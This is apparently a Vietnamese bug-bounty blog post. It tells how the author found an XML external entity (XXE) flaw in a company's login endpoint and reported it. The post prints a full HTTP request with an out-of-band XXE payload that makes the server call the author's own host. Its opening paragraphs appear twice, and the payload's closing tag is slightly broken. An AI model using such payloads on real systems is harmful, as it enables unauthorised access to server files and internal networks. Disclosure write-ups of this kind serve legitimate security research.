Khai thác lỗi XXE
Hi,
Dạo gần đây, mình có được mời vào một số chương trình bug bounty riêng (private bug bounty program), cái hay của mấy cái chương trình này là, họ thường trong giai đoạn beta, nhiều thứ để nghịch.
Có một chương trình khiến cho mình cảm thấy thú vị nhất, đó là một công ty bên Thụy Sỹ, network của họ có đến hơn 10+ cái, quá nhiều host để test, mà kỹ thuật của họ thì có lẽ cũng tầm tầm như mình (i.e. gà :D), team về an toàn thông tin của họ có đến hơn 20 người, cơ mà bug vẫn cứ tràn lan.
Sau vài ngày mò mẫm, mình cũng kiếm được vài cái XSS, rồi thì một cái SQLi, cơ mà bypass cái filter của mình cũng khiến mình phát bực.
Có hôm, tối say quá. cũng cứ lôi cái Burpsuite ra nghịch (về cơ bản thì nó cũng không bao giờ tắt :D), gặp quả target đạp vào mặt cái login form, chả fingerprint cái portal làm gì cả, cứ thử ném cái XML tag vào, nghĩ chắc cũng chẳng có gì, reponse về thấy "error ... mismatch tag ", haha, kiểu gì cũng có cái vui cho mà xem, chỉnh lại cái request trong Burpsuite cho đúng với syntax của XML
Dạo gần đây, mình có được mời vào một số chương trình bug bounty riêng (private bug bounty program), cái hay của mấy cái chương trình này là, họ thường trong giai đoạn beta, nhiều thứ để nghịch.
Có một chương trình khiến cho mình cảm thấy thú vị nhất, đó là một công ty bên Thụy Sỹ, network của họ có đến hơn 10+ cái, quá nhiều host để test, mà kỹ thuật của họ thì có lẽ cũng tầm tầm như mình (i.e. gà :D), team về an toàn thông tin của họ có đến hơn 20 người, cơ mà bug vẫn cứ tràn lan.
Sau vài ngày mò mẫm, mình cũng kiếm được vài cái XSS, rồi thì một cái SQLi, cơ mà bypass cái filter của mình cũng khiến mình phát bực.
Có hôm, tối say quá. cũng cứ lôi cái Burpsuite ra nghịch (về cơ bản thì nó cũng không bao giờ tắt :D), gặp quả target đạp vào mặt cái login form, chả fingerprint cái portal làm gì cả, cứ thử ném cái XML tag vào, nghĩ chắc cũng chẳng có gì, reponse về thấy "error ... mismatch tag ", haha, kiểu gì cũng có cái vui cho mà xem, chỉnh lại cái request trong Burpsuite cho đúng với syntax của XML
POST /users/sign_in HTTP/1.1
Content-Length: 157
Content-type: text/xml
Host: 138.xxx.xxx.xxx
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtm2kyo [
<!ENTITY % dtd SYSTEM "http://118.70.xxx.xxx/hacked? ">
%dtd;]>
<sign_in>&dtm2kyoent;</sign_ in>
Setup một cái SimpleHTTPServer tại con gateway của mình cái, and voila, connect từ máy chủ của họ
1. Contact email with detail sent
2. 03 hours later, received email from their security team
3. 01 hours later, confirmed
4. 01 day later, fixed, and bounty :D

Comments
Post a Comment